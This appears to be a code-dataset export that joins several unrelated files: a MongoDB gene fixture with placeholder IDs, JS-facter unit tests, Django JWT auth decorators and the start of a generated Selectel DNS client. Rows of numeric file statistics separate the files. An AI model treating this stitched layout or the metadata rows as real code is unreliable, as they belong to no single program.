"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0031",
},
"NOS3": {
"name": "NOS3",
"searchable_name": "nos3",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0032",
},
"TLR4": {
"name": "TLR4",
"searchable_name": "tlr4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0033",
},
"COMT": {
"name": "COMT",
"searchable_name": "comt",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0034",
},
"CTNNB1": {
"name": "CTNNB1",
"searchable_name": "ctnnb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0035",
},
"PTEN": {
"name": "PTEN",
"searchable_name": "pten",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0036",
},
"CXCL8": {
"name": "CXCL8",
"searchable_name": "cxcl8",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0037",
},
"CFTR": {
"name": "CFTR",
"searchable_name": "cftr",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0038",
},
"PPARG": {
"name": "PPARG",
"searchable_name": "pparg",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0039",
},
"SLC6A4": {
"name": "SLC6A4",
"searchable_name": "slc6a4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0040",
},
"HLA-B": {
"name": "HLA-B",
"searchable_name": "hla-b",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0041",
},
"TERT": {
"name": "TERT",
"searchable_name": "tert",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0042",
},
"SNCA": {
"name": "SNCA",
"searchable_name": "snca",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0043",
},
"CDH1": {
"name": "CDH1",
"searchable_name": "cdh1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0044",
},
"IGF1": {
"name": "IGF1",
"searchable_name": "igf1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0045",
},
"MYC": {
"name": "MYC",
"searchable_name": "myc",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0046",
},
"GSTM1": {
"name": "GSTM1",
"searchable_name": "gstm1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0047",
},
"BCL2": {
"name": "BCL2",
"searchable_name": "bcl2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0048",
},
"MTOR": {
"name": "MTOR",
"searchable_name": "mtor",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0049",
},
"MAPT": {
"name": "MAPT",
"searchable_name": "mapt",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0050",
},
"LEP": {
"name": "LEP",
"searchable_name": "lep",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0051",
},
"CXCR4": {
"name": "CXCR4",
"searchable_name": "cxcr4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0052",
},
"IFNG": {
"name": "IFNG",
"searchable_name": "ifng",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0053",
},
"CD4": {
"name": "CD4",
"searchable_name": "cd4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0054",
},
"MDM2": {
"name": "MDM2",
"searchable_name": "mdm2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0055",
},
"JAK2": {
"name": "JAK2",
"searchable_name": "jak2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0056",
},
"BRCA2": {
"name": "BRCA2",
"searchable_name": "brca2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0057",
},
"MMP2": {
"name": "MMP2",
"searchable_name": "mmp2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0058",
},
"MAPK1": {
"name": "MAPK1",
"searchable_name": "mapk1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0059",
},
"SERPINE1": {
"name": "SERPINE1",
"searchable_name": "serpine1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0060",
},
"CCND1": {
"name": "CCND1",
"searchable_name": "ccnd1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0061",
},
"CCR5": {
"name": "CCR5",
"searchable_name": "ccr5",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0062",
},
"GSTT1": {
"name": "GSTT1",
"searchable_name": "gstt1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0063",
},
"CDKN1A": {
"name": "CDKN1A",
"searchable_name": "cdkn1a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0064",
},
"PON1": {
"name": "PON1",
"searchable_name": "pon1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0065",
},
"CCL2": {
"name": "CCL2",
"searchable_name": "ccl2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0066",
},
"BIRC5": {
"name": "BIRC5",
"searchable_name": "birc5",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0067",
},
"NPPB": {
"name": "NPPB",
"searchable_name": "nppb",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0068",
},
"F2": {
"name": "F2",
"searchable_name": "f2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0069",
},
"GSTP1": {
"name": "GSTP1",
"searchable_name": "gstp1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0070",
},
"PIK3CA": {
"name": "PIK3CA",
"searchable_name": "pik3ca",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0071",
},
"SOD1": {
"name": "SOD1",
"searchable_name": "sod1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0072",
},
"IL17A": {
"name": "IL17A",
"searchable_name": "il17a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0073",
},
"HLA-A": {
"name": "HLA-A",
"searchable_name": "hla-a",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0074",
},
"TLR2": {
"name": "TLR2",
"searchable_name": "tlr2",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0075",
},
"CTLA4": {
"name": "CTLA4",
"searchable_name": "ctla4",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0076",
},
"F5": {
"name": "F5",
"searchable_name": "f5",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0077",
},
"HLA-DQB1": {
"name": "HLA-DQB1",
"searchable_name": "hla-dqb1",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0078",
},
"HFE": {
"name": "HFE",
"searchable_name": "hfe",
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
"study_id": ObjectId("5d276a50421aa9117c982845"),
"gene_id": "FAKE0079",
},
},
}
| 38.53493 | 66 | 0.489716 | 34,756 | 445,695 | 5.943779 | 0.013811 | 0.009972 | 0.055378 | 0.04512 | 0.972234 | 0.960224 | 0.960147 | 0.927922 | 0.925192 | 0.694334 | 0 | 0.132182 | 0.418733 | 445,695 | 11,565 | 67 | 38.538262 | 0.665223 | 0 | 0 | 0.923469 | 0 | 0 | 0.464567 | 0.396444 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000086 | 0 | 0.000086 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e8b9c50c903ed2e2e9a2370ada1ddc8634106364 | 166 | py | Python | f90/__init__.py | Guymer/hml | 8652affd7ee987cddd9513a3e43f5083953858ed | [
"Apache-2.0"
] | null | null | null | f90/__init__.py | Guymer/hml | 8652affd7ee987cddd9513a3e43f5083953858ed | [
"Apache-2.0"
] | null | null | null | f90/__init__.py | Guymer/hml | 8652affd7ee987cddd9513a3e43f5083953858ed | [
"Apache-2.0"
] | null | null | null | """
A Python module containing FORTRAN ports of some functions from "funcs" to be
called from Python using f2py.
"""
# Import sub-functions ...
from .f90 import f90
| 20.75 | 77 | 0.73494 | 25 | 166 | 4.88 | 0.76 | 0.213115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036496 | 0.174699 | 166 | 7 | 78 | 23.714286 | 0.854015 | 0.807229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e8c5136fa09e23ee43da286f539e3fe39e621779 | 7,249 | py | Python | tests/unit/facters/test_js.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | tests/unit/facters/test_js.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | tests/unit/facters/test_js.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import lxml.html
from mock import Mock, call
from preggy import expect
from holmes.config import Config
from holmes.reviewer import Reviewer
from holmes.facters.js import JSFacter
from tests.unit.base import FacterTestCase
from tests.fixtures import PageFactory
class TestJSFacter(FacterTestCase):
def test_can_get_facts(self):
page = PageFactory.create(url='http://my-site.com/')
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<script type="text/javascript" src="teste.js"></script>'
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
response = Mock(status_code=200, text=content, headers={})
reviewer.content_loaded(page.url, response)
facter = JSFacter(reviewer)
facter.add_fact = Mock()
facter.async_get = Mock()
facter.get_facts()
expect(facter.add_fact.call_args_list).to_include(
call(
key='page.js',
value=set([]),
))
expect(facter.add_fact.call_args_list).to_include(
call(
key='total.size.js',
value=0,
))
expect(facter.add_fact.call_args_list).to_include(
call(
key='total.size.js.gzipped',
value=0,
))
expect(facter.add_fact.call_args_list).to_include(
call(
key='total.requests.js',
value=1,
))
expect(facter.review.data).to_length(3)
expect(facter.review.data).to_be_like({
'total.size.js.gzipped': 0,
'page.js': set([]),
'total.size.js': 0
})
facter.async_get.assert_called_once_with(
'http://my-site.com/teste.js',
facter.handle_url_loaded
)
def test_handle_url_loaded(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<script type="text/javascript" src="teste.js"></script>'
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
response = Mock(status_code=200, text=content, headers={})
reviewer.content_loaded(page.url, response)
facter = JSFacter(reviewer)
facter.async_get = Mock()
facter.get_facts()
facter.handle_url_loaded(page.url, response)
expect(facter.review.data).to_include('total.size.js')
expect(facter.review.data['total.size.js']).to_equal(0.0537109375)
expect(facter.review.data).to_include('total.size.js.gzipped')
expect(facter.review.data['total.size.js.gzipped']).to_equal(0.05078125)
expect(facter.review.data).to_include('page.js')
data = set([(page.url, response)])
expect(facter.review.data['page.js']).to_equal(data)
def test_handle_url_loaded_with_empty_content(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = ''
result = {
'url': page.url,
'status': 200,
'content': content,
'html': content
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
response = Mock(status_code=200, text=content, headers={})
reviewer.content_loaded(page.url, response)
facter = JSFacter(reviewer)
facter.async_get = Mock()
facter.get_facts()
facter.handle_url_loaded(page.url, response)
expect(facter.review.data).to_include('total.size.js')
expect(facter.review.data['total.size.js']).to_equal(0)
expect(facter.review.data).to_include('total.size.js.gzipped')
expect(facter.review.data['total.size.js.gzipped']).to_equal(0)
def test_can_get_fact_definitions(self):
reviewer = Mock()
facter = JSFacter(reviewer)
definitions = facter.get_fact_definitions()
expect(definitions).to_length(4)
expect('page.js' in definitions).to_be_true()
expect('total.size.js' in definitions).to_be_true()
expect('total.size.js.gzipped' in definitions).to_be_true()
expect('total.requests.js' in definitions).to_be_true()
def test_invalid_url(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<html><link href="http://].js" /></html>'
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
response = Mock(status_code=200, text=content, headers={})
reviewer.content_loaded(page.url, response)
facter = JSFacter(reviewer)
facter.add_fact = Mock()
facter.async_get = Mock()
facter.get_facts()
expect(facter.add_fact.call_args_list).to_include(
call(
key='page.js',
value=set([]),
))
expect(facter.add_fact.call_args_list).to_include(
call(
key='total.size.js',
value=0,
))
expect(facter.add_fact.call_args_list).to_include(
call(
key='total.size.js.gzipped',
value=0,
))
expect(facter.add_fact.call_args_list).to_include(
call(
key='total.requests.js',
value=0,
))
expect(facter.review.data).to_include('total.size.js')
expect(facter.review.data['total.size.js']).to_equal(0)
expect(facter.review.data).to_include('total.size.js.gzipped')
expect(facter.review.data['total.size.js.gzipped']).to_equal(0)
expect(facter.review.data).to_include('page.js')
expect(facter.review.data['page.js']).to_equal(set([]))
| 30.330544 | 80 | 0.566147 | 822 | 7,249 | 4.817518 | 0.126521 | 0.078788 | 0.055556 | 0.1 | 0.822727 | 0.799495 | 0.793687 | 0.781818 | 0.753283 | 0.734596 | 0 | 0.016449 | 0.303904 | 7,249 | 238 | 81 | 30.457983 | 0.768331 | 0.005242 | 0 | 0.740741 | 0 | 0 | 0.111943 | 0.041892 | 0 | 0 | 0 | 0 | 0.005291 | 1 | 0.026455 | false | 0 | 0.042328 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fa313600e95dfde8a925c72c3a0ca0a88897b2b5 | 2,619 | py | Python | api/user/utils.py | jain-tt/exporterhub.io | 46629d5b942a48506d91bbbd7f86ae820a07fc87 | [
"MIT"
] | 384 | 2020-07-29T06:49:17.000Z | 2022-02-12T12:07:36.000Z | api/user/utils.py | jain-tt/exporterhub.io | 46629d5b942a48506d91bbbd7f86ae820a07fc87 | [
"MIT"
] | 58 | 2020-09-02T05:01:11.000Z | 2021-10-12T00:51:48.000Z | api/user/utils.py | jain-tt/exporterhub.io | 46629d5b942a48506d91bbbd7f86ae820a07fc87 | [
"MIT"
] | 80 | 2020-08-18T08:16:19.000Z | 2022-01-25T08:26:03.000Z | import jwt
import json
from django.http import JsonResponse
from django.conf import settings
from user.models import User
def login_check(func):
def wrapper(self, request, *args, **kwargs):
try:
access_token = request.headers.get('Authorization', None)
if not access_token:
request.user = None
return func(self, request, *args, **kwargs)
payload = jwt.decode(access_token, settings.SECRET_KEY, settings.ALGORITHM)
login_user = User.objects.get(id=payload['user_id'])
request.user = login_user
return func(self, request, *args, **kwargs)
except jwt.DecodeError:
return JsonResponse({'message' : 'INVALID_TOKEN'}, status=400)
except User.DoesNotExist:
return JsonResponse({'message' : 'INVALID_USER'}, status=401)
return wrapper
def login_decorator(func):
def wrapper(self, request, *args, **kwargs):
if 'Authorization' not in request.headers:
return JsonResponse({'message': 'NEED_LOGIN'}, status=401)
try:
access_token = request.headers['Authorization']
payload = jwt.decode(access_token, settings.SECRET_KEY, settings.ALGORITHM)
login_user = User.objects.get(id=payload['user_id'])
request.user = login_user
return func(self, request, *args, **kwargs)
except jwt.DecodeError:
return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)
except User.DoesNotExist:
return JsonResponse({'message': 'INVALID_USER'}, status=401)
return wrapper
def admin_decorator(func):
def wrapper(self, request, *args, **kwargs):
if 'Authorization' not in request.headers:
return JsonResponse({'message': 'NEED_LOGIN'}, status=401)
try:
access_token = request.headers['Authorization']
payload = jwt.decode(access_token, settings.SECRET_KEY, settings.ALGORITHM)
login_user = User.objects.get(id=payload['user_id'])
if not login_user.type.name == 'admin':
return JsonResponse({'message' : 'ACCESS_DENIED'}, status=401)
request.user = login_user
return func(self, request, *args, **kwargs)
except jwt.DecodeError:
return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)
except User.DoesNotExist:
return JsonResponse({'message': 'INVALID_USER'}, status=401)
return wrapper | 34.92 | 92 | 0.608629 | 275 | 2,619 | 5.68 | 0.189091 | 0.103713 | 0.144046 | 0.09411 | 0.838028 | 0.820102 | 0.800256 | 0.777849 | 0.777849 | 0.777849 | 0 | 0.014385 | 0.283314 | 2,619 | 75 | 93 | 34.92 | 0.817794 | 0 | 0 | 0.735849 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113208 | false | 0 | 0.09434 | 0 | 0.509434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
d78cb5c8aa922ddaed3d5840193c55bc16dfed3a | 32,837 | py | Python | selectel_dns_api/apis/domains_api.py | nwton/fork_mdsina_selectel-dns-api | 30b02260a3bf86e0fbbafad372292aafb13206ee | [
"Apache-2.0"
] | null | null | null | selectel_dns_api/apis/domains_api.py | nwton/fork_mdsina_selectel-dns-api | 30b02260a3bf86e0fbbafad372292aafb13206ee | [
"Apache-2.0"
] | null | null | null | selectel_dns_api/apis/domains_api.py | nwton/fork_mdsina_selectel-dns-api | 30b02260a3bf86e0fbbafad372292aafb13206ee | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Selectel DNS API
Simple Selectel DNS API.
OpenAPI spec version: 1.0.0
Contact: info@mdsina.ru
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DomainsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_domain(self, body, **kwargs):
"""
Create new domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_domain(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param NewDomain body: Domain info for creation (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_domain_with_http_info(body, **kwargs)
else:
(data) = self.add_domain_with_http_info(body, **kwargs)
return data
def add_domain_with_http_info(self, body, **kwargs):
"""
Create new domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_domain_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param NewDomain body: Domain info for creation (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_domain" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_domain`")
collection_formats = {}
resource_path = '/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Domain',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_domain(self, domain_id, **kwargs):
"""
Deletes a domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_domain(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_domain_with_http_info(domain_id, **kwargs)
else:
(data) = self.delete_domain_with_http_info(domain_id, **kwargs)
return data
def delete_domain_with_http_info(self, domain_id, **kwargs):
"""
Deletes a domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_domain_with_http_info(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_domain" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `delete_domain`")
collection_formats = {}
resource_path = '/{domain_id}'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_domain_by_id(self, domain_id, **kwargs):
"""
Find domain by ID
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_id(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_domain_by_id_with_http_info(domain_id, **kwargs)
else:
(data) = self.get_domain_by_id_with_http_info(domain_id, **kwargs)
return data
def get_domain_by_id_with_http_info(self, domain_id, **kwargs):
"""
Find domain by ID
Returns a single domain
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_domain_by_id_with_http_info(domain_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int domain_id: ID of domain to return (required)
:return: Domain
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['domain_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_domain_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'domain_id' is set
if ('domain_id' not in params) or (params['domain_id'] is None):
raise ValueError("Missing the required parameter `domain_id` when calling `get_domain_by_id`")
collection_formats = {}
resource_path = '/{domain_id}'.replace('{format}', 'json')
path_params = {}
if 'domain_id' in params:
path_params['domain_id'] = params['domain_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
